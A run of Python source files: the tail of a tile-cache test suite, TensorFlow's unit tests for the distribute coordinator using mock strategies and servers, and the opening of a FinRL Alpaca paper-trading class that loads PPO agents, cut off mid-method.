# this case. Better, is to use a threading lock when setting the
# cache, which should never have the problem.
self.cache = cachetools.LRUCache(10)
self.cache_lock = None
loopSize = 10000
sumDelta = 2
def keyFunc(x):
return x
@methodcache(keyFunc)
def add(self, x):
return x + sumDelta
def loop():
sum = 0
for x in range(loopSize):
sum += add(self, x)
sums.append(sum)
# Without a thread lock
sums = []
threadList = [threading.Thread(target=loop) for t in range(5)]
for t in threadList:
t.start()
for t in threadList:
t.join()
for sum in sums:
assert sum == loopSize * (loopSize - 1) / 2 + loopSize * sumDelta
# With a thread lock
self.cache = cachetools.LRUCache(10)
self.cache_lock = threading.Lock()
sums = []
threadList = [threading.Thread(target=loop) for t in range(5)]
for t in threadList:
t.start()
for t in threadList:
t.join()
for sum in sums:
assert sum == loopSize * (loopSize - 1) / 2 + loopSize * sumDelta
@six.add_metaclass(LruCacheMetaclass)
class ExampleWithMetaclass(object):
cacheName = 'test'
cacheMaxSize = 4
def __init__(self, arg):
pass
def testCachesInfo(self):
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
assert cachesInfo()['test']['used'] == 0
assert 'tileCache' not in cachesInfo()
self.ExampleWithMetaclass('test')
assert cachesInfo()['test']['used'] == 1
config.setConfig('cache_backend', 'python')
getTileCache()
assert 'tileCache' in cachesInfo()
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'memcached')
getTileCache()
# memcached won't show that it is present
assert 'tileCache' not in cachesInfo()
def testCachesClear(self):
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'python')
self.ExampleWithMetaclass('test')
getTileCache()
assert cachesInfo()['test']['used'] == 1
cachesClear()
assert cachesInfo()['test']['used'] == 0
|
distribute_coordinator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import threading
import time
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER
NUM_WORKERS = 3
NUM_PS = 2
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
if isinstance(maybe_bytes, six.string_types):
return maybe_bytes
else:
return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=None,
should_checkpoint=None,
should_save_summary=None):
self._between_graph = between_graph
self._should_init = should_init
self._should_checkpoint = should_checkpoint
self._should_save_summary = should_save_summary
@property
def between_graph(self):
return self._between_graph
def configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
if self._should_init is None:
if task_id == 0:
self._should_init = True
else:
self._should_init = False
if self._should_checkpoint is None:
if task_id == 0:
self._should_checkpoint = True
else:
self._should_checkpoint = False
if self._should_save_summary is None:
if task_id == 0:
self._should_save_summary = True
else:
self._should_save_summary = False
if session_config:
if (cluster_spec and task_type and task_id is not None and
self._between_graph):
session_config.intra_op_parallelism_threads += 1
if task_type in ["chief", "worker"]:
session_config.device_filters.extend(
["/job:%s/task:%d" % (task_type, task_id), "/job:ps"])
else:
session_config.inter_op_parallelism_threads += 1
session_config.device_filters.append("/job:somejob")
@property
def should_init(self):
return self._should_init
@property
def should_checkpoint(self):
return self._should_checkpoint
@property
def should_save_summary(self):
return self._should_save_summary
class MockServer(object):
def __init__(self):
self._joined = False
self._started = False
def start(self):
self._started = True
def join(self):
assert not self._joined
self._joined = True
@property
def joined(self):
return self._joined
@property
def started(self):
return self._started
class DistributeCoordinatorTestBase(test.TestCase):
@classmethod
def setUpClass(cls):
# We have to create a global in-process cluster because once an in-process
# tensorflow server is created, there is no way to terminate it. Please see
# multi_worker_test_base.py for more details.
# TODO(yuefengz): use the utitliy from multi_worker_test_base.
cls._workers, cls._ps = test_util.create_local_cluster(
NUM_WORKERS, num_ps=NUM_PS)
cls._cluster_spec = {
WORKER: [
_strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
],
PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
}
def setUp(self):
self._result_correct = 0
self._lock = threading.Lock()
self._worker_context = {}
self._strategy_property = {}
self._std_servers = {}
self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)
@contextlib.contextmanager
def _test_session(self, target):
config = config_pb2.ConfigProto(allow_soft_placement=True)
config.graph_options.optimizer_options.opt_level = -1
with session.Session(graph=None, config=config, target=target) as sess:
yield sess
# TODO(yuefengz): use the utitliy from multi_worker_test_base.
def _create_cluster_spec(self,
has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
if num_workers:
cluster_spec[WORKER] = [
"localhost:%s" % portpicker.pick_unused_port()
for _ in range(num_workers)
]
if num_ps:
cluster_spec[PS] = [
"localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
return cluster_spec
def _in_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
xs = []
expected = 0.0
for i in range(context.num_workers):
with ops.device("/job:worker/task:%d" % i):
x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
x_add = x.assign_add(float(i))
xs.append(x_add)
expected += i + 10.0
with ops.device("/job:worker/task:0"):
result = math_ops.add_n(xs)
variables.global_variables_initializer().run()
result_value = sess.run(result)
self.assertEqual(result_value, expected)
if result_value == expected:
self._result_correct += 1
def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
t = threading.Thread(
target=distribute_coordinator.run_distribute_coordinator,
args=(worker_fn, strategy),
kwargs=kwargs)
t.start()
return t
def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
cluster_spec, **kwargs):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_coordinator_in_thread(
worker_fn,
strategy,
cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id,
**kwargs)
threads[task_type].append(t)
return threads
def _between_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable(
"x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable(
"y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
if context.is_chief:
variables.global_variables_initializer().run()
# Synchronize workers after initializaton.
if context.has_barrier:
context.wait_for_other_workers()
else:
while True:
uninit_vars = sess.run(variables.report_uninitialized_variables())
# pylint: disable=g-explicit-length-test
if len(uninit_vars) == 0:
break
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _between_graph_with_monitored_session(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable("xx", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable("yy", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
# The monitored session will run init or ready ops.
with monitored_session.MonitoredSession() as sess:
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _dump_worker_context(self, strategy):
"""Dumps the propoerties of each worker context.
It dumps the context properties to a dict mapping from task_type to a list
of tuples of master_target, num_workers, is_chief and distribute_mode, where
the list is indexed by the task_id.
Args:
strategy: a `DistributionStrategy` object.
"""
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._worker_context:
self._worker_context[task_type] = []
while len(self._worker_context[task_type]) <= task_id:
self._worker_context[task_type].append(None)
self._worker_context[task_type][task_id] = (context.master_target,
context.num_workers,
context.is_chief,
context.distributed_mode)
def _dump_strategy_property(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
self.assertEqual(context._strategy.should_init, strategy.should_init)
self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
self.assertEqual(context.should_save_summary, strategy.should_save_summary)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._strategy_property:
self._strategy_property[task_type] = []
while len(self._strategy_property[task_type]) <= task_id:
self._strategy_property[task_type].append(None)
self._strategy_property[task_type][task_id] = (
context._strategy.should_init, context.should_checkpoint,
context.should_save_summary)
def _run_mock_std_server(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None,
rpc_layer=None,
environment=None):
task_type = str(task_type)
task_id = task_id or 0
with self._lock:
if task_type not in self._std_servers:
self._std_servers[task_type] = []
while len(self._std_servers[task_type]) <= task_id:
self._std_servers[task_type].append(None)
server = MockServer()
self._std_servers[task_type][task_id] = server
return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
def testInGraphStandaloneMode(self):
"""Test it runs in-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
"""Test it runs between-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
"""Test monitored session in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))
def testBetweenGraphStrategyProperties(self):
# Dumps properties of the strategy objects.
distribute_coordinator.run_distribute_coordinator(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
def testLocalContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=None)
# There is only a "None" task.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))
def testBetweenGraphContextWithChief(self):
# Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[CHIEF] = ["fake_chief"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=cluster_spec,
rpc_layer="grpc")
# There are one CHIEF and three workers.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue(CHIEF in self._worker_context)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[CHIEF]), 1)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context[CHIEF][0],
("grpc://fake_chief", 4, True, True))
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[EVALUATOR] = ["fake_evaluator"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=cluster_spec,
rpc_layer=None)
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
_bytes_to_str(self._workers[0].target)), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestInpendentWorkerMode(
DistributeCoordinatorTestBase):
def testInGraph(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
threads = self._run_multiple_coordinator_in_threads(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER)
threads[WORKER][0].join()
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertFalse(self._std_servers[WORKER][1].joined)
self.assertFalse(self._std_servers[WORKER][2].joined)
def testBetweenGraphStrategyProperties(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps properties of the strategy objects.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, has_eval=True)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
threads[EVALUATOR][0].join()
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
(cluster_spec[EVALUATOR][0], 3, True, False))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 2)
self.assertTrue(WORKER in self._std_servers)
self.assertTrue(EVALUATOR in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
self.assertFalse(self._std_servers[EVALUATOR][0].joined)
def testRunStdServerInGoogleEnvironment(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
tf_config = {"cluster": cluster_spec, "environment": "google"}
joined = [False]
def _fake_sleep(_):
joined[0] = True
original_sys_exit(0)
def _thread_fn(cluster_spec):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
time, "sleep", _fake_sleep):
t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
t.start()
t.join()
self.assertTrue(joined[0])
def testRpcLayerEnvironmentVariable(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}
rpc_layer_from_coordinator = [None]
def _run_mock_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None,
environment=None):
del cluster_spec, task_type, task_id, session_config, environment
rpc_layer_from_coordinator[0] = rpc_layer
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _run_mock_server):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
self.assertEqual(rpc_layer_from_coordinator[0], "cake")
class StrategyConfigureTest(test.TestCase):
def setUp(self):
self._device_filters = []
self._intra_op_parallelism_threads = None
self._inter_op_parallelism_threads = None
super(StrategyConfigureTest, self).setUp()
def _dump_device_filters(self, *args, **kwargs):
session_config = kwargs.get("session_config", None)
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def _worker_fn(self, strategy):
worker_context = distribute_coordinator_context.get_current_worker_context()
session_config = worker_context._session_config
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def test_session_config_in_std_server(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server",
self._dump_device_filters):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._intra_op_parallelism_threads, 1)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_session_config_in_session_creator(self):
cluster_spec = {"worker": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
self._worker_fn,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._device_filters, ["/job:worker/task:0", "/job:ps"])
self.assertEqual(self._intra_op_parallelism_threads, 2)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_eval_strategy_configure(self):
cluster_spec = {"evaluator": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=False),
eval_fn=self._worker_fn,
eval_strategy=MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="evaluator",
task_id=0)
self.assertEqual(self._device_filters, ["/job:somejob"])
self.assertEqual(self._intra_op_parallelism_threads, 0)
self.assertEqual(self._inter_op_parallelism_threads, 2)
class RunStandardTensorflowServerTest(test.TestCase):
def test_std_server_arguments(self):
cs = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cs, "task": {"type": "ps", "id": 0}}
def _mock_run_std_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None):
self.assertEqual(cluster_spec.as_dict(), cs)
self.assertEqual(task_type, "ps")
self.assertEqual(task_id, 0)
self.assertEqual(session_config.experimental.collective_group_leader,
"/job:worker/replica:0/task:0")
self.assertEqual(session_config.intra_op_parallelism_threads, 1)
self.assertEqual(rpc_layer, "grpc")
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _mock_run_std_server):
session_config = config_pb2.ConfigProto()
session_config.intra_op_parallelism_threads = 1
mock_server = distribute_coordinator.run_standard_tensorflow_server(
session_config)
self.assertTrue(mock_server.started)
if __name__ == "__main__":
# TODO(yuefengz): find a smart way to terminite std server threads.
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
env_stock_papertrading.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import gym
import numpy as np
import pandas as pd
import torch
from finrl_meta.data_processors.processor_alpaca import AlpacaProcessor
class AlpacaPaperTrading():
def __init__(self, ticker_list, time_interval, drl_lib, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
APCA_API_BASE_URL, tech_indicator_list, turbulence_thresh=30,
max_stock=1e2, latency=None):
# load agent
self.drl_lib = drl_lib
if agent == 'ppo':
if drl_lib == 'elegantrl':
from elegantrl.agent import AgentPPO
from elegantrl.run import Arguments, init_agent
# load agent
config = {'state_dim': state_dim,
'action_dim': action_dim, }
args = Arguments(agent=AgentPPO, env=StockEnvEmpty(config))
args.cwd = cwd
args.net_dim = net_dim
# load agent
try:
agent = init_agent(args, gpu_id=0)
self.act = agent.act
self.device = agent.device
except BaseException:
raise ValueError("Fail to load agent!")
elif drl_lib == 'rllib':
from ray.rllib.agents import ppo
from ray.rllib.agents.ppo.ppo import PPOTrainer
config = ppo.DEFAULT_CONFIG.copy()
config['env'] = StockEnvEmpty
config["log_level"] = "WARN"
config['env_config'] = {'state_dim': state_dim,
'action_dim': action_dim, }
trainer = PPOTrainer(env=StockEnvEmpty, config=config)
trainer.restore(cwd)
try:
trainer.restore(cwd)
self.agent = trainer
print("Restoring from checkpoint path", cwd)
except:
raise ValueError('Fail to load agent!')
elif drl_lib == 'stable_baselines3':
from stable_baselines3 import PPO
try:
# load agent
self.model = PPO.load(cwd)
print("Successfully load model", cwd)
except:
raise ValueError('Fail to load agent!')
else:
